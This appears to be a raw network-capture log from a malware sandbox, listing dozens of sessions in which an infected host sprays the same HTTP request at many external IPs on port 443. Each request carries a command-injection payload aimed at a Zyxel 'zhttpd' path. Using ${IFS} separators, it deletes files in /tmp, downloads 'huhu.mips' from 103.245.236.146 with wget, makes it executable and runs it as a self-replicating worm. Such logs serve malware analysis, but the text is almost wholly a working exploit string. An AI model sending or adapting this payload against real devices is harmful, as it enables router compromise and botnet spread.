                                                Jan 29, 2024 07:08:04.676776886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8381192.168.2.2355780173.225.110.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676800013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8382192.168.2.2344844158.38.168.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676840067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8383192.168.2.2341790205.70.165.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676872015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8384192.168.2.2350886193.140.83.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676896095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8385192.168.2.2350528145.76.230.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676935911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8386192.168.2.2351590141.117.46.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.676970959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8387192.168.2.235825483.142.147.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677030087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8388192.168.2.235444297.175.10.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677061081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8389192.168.2.2334534118.178.188.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677092075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8390192.168.2.234301486.122.142.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677155972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8391192.168.2.234963692.171.182.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677196026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8392192.168.2.2343662174.163.0.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677232981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8393192.168.2.233404089.72.32.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677284956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8394192.168.2.235147284.59.3.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677330971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8395192.168.2.2339292205.120.77.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677364111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8396192.168.2.2357288213.100.196.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677385092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8397192.168.2.2360880205.206.33.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677413940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8398192.168.2.2338398196.243.25.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677468061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8399192.168.2.234017486.160.210.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677501917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8400192.168.2.2358026178.199.209.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677531004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8401192.168.2.234258040.211.78.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677584887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8402192.168.2.2342036167.254.3.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677623034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8403192.168.2.233963043.214.26.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677648067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8404192.168.2.234739680.160.196.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677692890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8405192.168.2.2347424101.76.53.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677742958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8406192.168.2.233712297.122.176.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677798033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8407192.168.2.233843466.68.33.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677814960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8408192.168.2.2348004218.212.106.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677892923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8409192.168.2.235559065.249.21.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677925110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8410192.168.2.234689071.216.105.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677947998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8411192.168.2.2349534209.206.200.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.677983999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8412192.168.2.2342292197.97.50.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678024054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8413192.168.2.233952877.196.10.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678078890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8414192.168.2.2343986145.93.244.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678111076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8415192.168.2.2352000107.251.2.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678149939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8416192.168.2.233970094.218.222.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678165913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8417192.168.2.2337096209.109.210.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678210974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8418192.168.2.2344678180.62.145.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678236008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8419192.168.2.2333912107.122.63.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678265095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8420192.168.2.234008027.223.189.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678280115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8421192.168.2.2333714115.166.73.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678339005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8422192.168.2.2359634107.132.38.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678386927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8423192.168.2.234495495.251.53.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678414106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8424192.168.2.2337850199.11.204.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678488016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8425192.168.2.2351850168.234.51.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678529978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8426192.168.2.235552470.106.65.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678543091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8427192.168.2.235901212.48.31.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678587914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8428192.168.2.234537686.46.250.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678621054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8429192.168.2.2338218124.199.236.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678678989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8430192.168.2.2335110212.179.216.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678719997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8431192.168.2.2358638209.212.45.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678739071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8432192.168.2.2345402138.87.223.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678786039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8433192.168.2.234989680.101.144.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678809881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8434192.168.2.234798832.161.23.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678853035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8435192.168.2.2335698123.216.243.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678915024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8436192.168.2.235794250.42.124.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678937912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8437192.168.2.2349176126.141.183.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.678987980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8438192.168.2.234645220.18.231.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679024935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8439192.168.2.2350154167.254.255.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679066896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8440192.168.2.2337528144.146.239.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679111958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8441192.168.2.2348968125.108.176.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679148912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8442192.168.2.2353726205.176.179.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679192066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8443192.168.2.2357494221.212.244.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:04.679239988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8444192.168.2.2333920103.4.35.106443
                                                TimestampBytes transferredDirectionData
